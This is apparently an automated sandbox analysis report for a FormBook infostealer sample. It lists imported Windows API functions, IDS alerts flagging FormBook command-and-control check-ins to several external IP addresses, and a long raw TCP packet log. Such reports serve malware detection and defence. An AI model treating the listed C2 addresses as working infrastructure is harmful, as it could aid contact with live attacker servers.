                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-06T10:05:31.408001+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64985738.47.233.2180TCP
                                                                    2024-12-06T10:05:31.408001+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64985738.47.233.2180TCP
                                                                    2024-12-06T10:05:48.268092+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649899104.21.7.18780TCP
                                                                    2024-12-06T10:05:50.924364+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649905104.21.7.18780TCP
                                                                    2024-12-06T10:05:53.580707+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649912104.21.7.18780TCP
                                                                    2024-12-06T10:05:56.367744+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649918104.21.7.18780TCP
                                                                    2024-12-06T10:05:56.367744+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649918104.21.7.18780TCP
                                                                    2024-12-06T10:06:05.092186+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649939206.238.89.11980TCP
                                                                    2024-12-06T10:06:07.740586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649947206.238.89.11980TCP
                                                                    2024-12-06T10:06:10.393360+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649956206.238.89.11980TCP
                                                                    2024-12-06T10:06:13.136575+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649962206.238.89.11980TCP
                                                                    2024-12-06T10:06:13.136575+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649962206.238.89.11980TCP
                                                                    2024-12-06T10:06:19.912720+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64997766.29.149.4680TCP
                                                                    2024-12-06T10:06:22.579528+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998566.29.149.4680TCP
                                                                    2024-12-06T10:06:25.230863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999366.29.149.4680TCP
                                                                    2024-12-06T10:06:27.894773+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64999966.29.149.4680TCP
                                                                    2024-12-06T10:06:27.894773+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999966.29.149.4680TCP
                                                                    2024-12-06T10:06:35.015331+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016217.70.184.5080TCP
                                                                    2024-12-06T10:06:37.684527+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650022217.70.184.5080TCP
                                                                    2024-12-06T10:06:40.442513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025217.70.184.5080TCP
                                                                    2024-12-06T10:06:43.025524+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650026217.70.184.5080TCP
                                                                    2024-12-06T10:06:43.025524+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026217.70.184.5080TCP
                                                                    2024-12-06T10:06:50.722386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002713.228.81.3980TCP
                                                                    2024-12-06T10:06:53.394332+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002813.228.81.3980TCP
                                                                    2024-12-06T10:06:56.050566+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002913.228.81.3980TCP
                                                                    2024-12-06T10:06:58.786529+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003013.228.81.3980TCP
                                                                    2024-12-06T10:06:58.786529+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003013.228.81.3980TCP
                                                                    2024-12-06T10:07:05.771308+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650032199.59.243.22780TCP
                                                                    2024-12-06T10:07:08.427626+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650033199.59.243.22780TCP
                                                                    2024-12-06T10:07:11.088789+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034199.59.243.22780TCP
                                                                    2024-12-06T10:07:13.738566+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650035199.59.243.22780TCP
                                                                    2024-12-06T10:07:13.738566+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650035199.59.243.22780TCP
                                                                    2024-12-06T10:07:20.894779+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650036172.67.178.9380TCP
                                                                    2024-12-06T10:07:23.551499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650037172.67.178.9380TCP
                                                                    2024-12-06T10:07:26.207724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650038172.67.178.9380TCP
                                                                    2024-12-06T10:07:29.655370+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650039172.67.178.9380TCP
                                                                    2024-12-06T10:07:29.655370+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650039172.67.178.9380TCP
                                                                    2024-12-06T10:07:36.229146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040172.67.192.20780TCP
                                                                    2024-12-06T10:07:38.894686+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041172.67.192.20780TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 6, 2024 10:05:29.756244898 CET4985780192.168.2.638.47.233.21
                                                                    Dec 6, 2024 10:05:29.876005888 CET804985738.47.233.21192.168.2.6
                                                                    Dec 6, 2024 10:05:29.876112938 CET4985780192.168.2.638.47.233.21
                                                                    Dec 6, 2024 10:05:29.894571066 CET4985780192.168.2.638.47.233.21
                                                                    Dec 6, 2024 10:05:30.015563011 CET804985738.47.233.21192.168.2.6
                                                                    Dec 6, 2024 10:05:31.407588959 CET804985738.47.233.21192.168.2.6
                                                                    Dec 6, 2024 10:05:31.407666922 CET804985738.47.233.21192.168.2.6
                                                                    Dec 6, 2024 10:05:31.408000946 CET4985780192.168.2.638.47.233.21
                                                                    Dec 6, 2024 10:05:31.411264896 CET4985780192.168.2.638.47.233.21
                                                                    Dec 6, 2024 10:05:31.530925989 CET804985738.47.233.21192.168.2.6
                                                                    Dec 6, 2024 10:05:46.604793072 CET4989980192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:46.724570036 CET8049899104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:46.724648952 CET4989980192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:46.753936052 CET4989980192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:46.873797894 CET8049899104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:48.268091917 CET4989980192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:48.388494015 CET8049899104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:48.388566971 CET4989980192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:49.286945105 CET4990580192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:49.406789064 CET8049905104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:49.406914949 CET4990580192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:49.421013117 CET4990580192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:49.540750980 CET8049905104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:50.924364090 CET4990580192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:51.044627905 CET8049905104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:51.044755936 CET4990580192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:51.943028927 CET4991280192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:52.062894106 CET8049912104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:52.062978983 CET4991280192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:52.076924086 CET4991280192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:52.196849108 CET8049912104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:52.196863890 CET8049912104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:53.580707073 CET4991280192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:53.700948000 CET8049912104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:53.701049089 CET4991280192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:54.599297047 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:54.719050884 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:54.719136953 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:54.727844000 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:54.847516060 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.367559910 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.367640018 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.367743969 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905147076 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905164003 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905184984 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905195951 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905214071 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905225992 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905239105 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905360937 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.905373096 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905373096 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.905543089 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.913495064 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.913819075 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.914052010 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:56.927419901 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.927438974 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:56.927571058 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.025602102 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.026359081 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.026465893 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.029604912 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.080708027 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.097481012 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.097543955 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.097655058 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.099462986 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.099802017 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.099843025 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.107832909 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.108108044 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.108163118 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.116338968 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.116986036 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.117259979 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.124406099 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.124907017 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.125504971 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.132704973 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.132955074 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.133132935 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.141035080 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.141066074 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.143521070 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.149360895 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.149696112 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.149746895 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.157762051 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.157998085 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.158049107 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.166034937 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.166706085 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.167527914 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.173074961 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.173499107 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.173583984 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.180074930 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.180944920 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.183615923 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.201889992 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.202424049 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.204052925 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.205449104 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.252595901 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.289019108 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.289586067 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.291379929 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.291534901 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.291723967 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295291901 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295305967 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.295350075 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.295382023 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.299695015 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.299850941 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:05:57.301920891 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.343424082 CET4991880192.168.2.6104.21.7.187
                                                                    Dec 6, 2024 10:05:57.463351011 CET8049918104.21.7.187192.168.2.6
                                                                    Dec 6, 2024 10:06:03.450577974 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.570847988 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:03.570955992 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.585201979 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:03.705127954 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.091571093 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.092137098 CET8049939206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:05.092185974 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:05.096575975 CET4993980192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.115087032 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.234946966 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:06.235012054 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.249603033 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:06.369541883 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.739245892 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.740489006 CET8049947206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:07.740586042 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:07.752835989 CET4994780192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.771769047 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.891958952 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:08.892232895 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:08.909856081 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:09.029818058 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:09.029831886 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.392932892 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.393304110 CET8049956206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:10.393359900 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:10.424902916 CET4995680192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.508790016 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.628659010 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:11.628743887 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.637531042 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:11.757337093 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136332989 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136364937 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:13.136574984 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:13.139316082 CET4996280192.168.2.6206.238.89.119
                                                                    Dec 6, 2024 10:06:13.259258986 CET8049962206.238.89.119192.168.2.6
                                                                    Dec 6, 2024 10:06:18.555876970 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.675667048 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:18.675821066 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.690048933 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:18.809783936 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912571907 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912662029 CET804997766.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:19.912719965 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:20.206288099 CET4997780192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.224910975 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.344636917 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:21.344724894 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.360471964 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:21.480274916 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579344988 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579474926 CET804998566.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:22.579528093 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:22.863748074 CET4998580192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:23.881448030 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.001399994 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:24.001534939 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.015970945 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:24.136781931 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:24.136795998 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230676889 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230709076 CET804999366.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:25.230863094 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:25.520780087 CET4999380192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.537631035 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.660532951 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:26.660608053 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.670553923 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:26.790404081 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894550085 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894635916 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:27.894773006 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:27.898320913 CET4999980192.168.2.666.29.149.46
                                                                    Dec 6, 2024 10:06:28.018101931 CET804999966.29.149.46192.168.2.6
                                                                    Dec 6, 2024 10:06:33.654608011 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.774310112 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:33.774393082 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.789685965 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:33.909545898 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015230894 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015274048 CET8050016217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:35.015331030 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:35.300168991 CET5001680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.323033094 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.442934036 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:36.443151951 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.457626104 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:36.577539921 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684429884 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684458017 CET8050022217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:37.684526920 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:37.972445011 CET5002280192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:38.997865915 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.117925882 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:39.118035078 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.133775949 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:39.255399942 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:39.255415916 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.441657066 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.442397118 CET8050025217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:40.442512989 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:40.644134045 CET5002580192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.662797928 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.782768011 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:41.782856941 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.792201996 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:41.912092924 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025305033 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025383949 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025394917 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025490999 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:43.025523901 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.025573015 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.030422926 CET5002680192.168.2.6217.70.184.50
                                                                    Dec 6, 2024 10:06:43.150055885 CET8050026217.70.184.50192.168.2.6
                                                                    Dec 6, 2024 10:06:49.083209038 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.202912092 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:49.203011036 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.216758966 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:49.338861942 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.722385883 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.799555063 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.799596071 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.799761057 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.799813032 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:50.842092037 CET805002713.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:50.842195034 CET5002780192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:51.754044056 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:51.874380112 CET805002813.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:51.874617100 CET5002880192.168.2.613.228.81.39
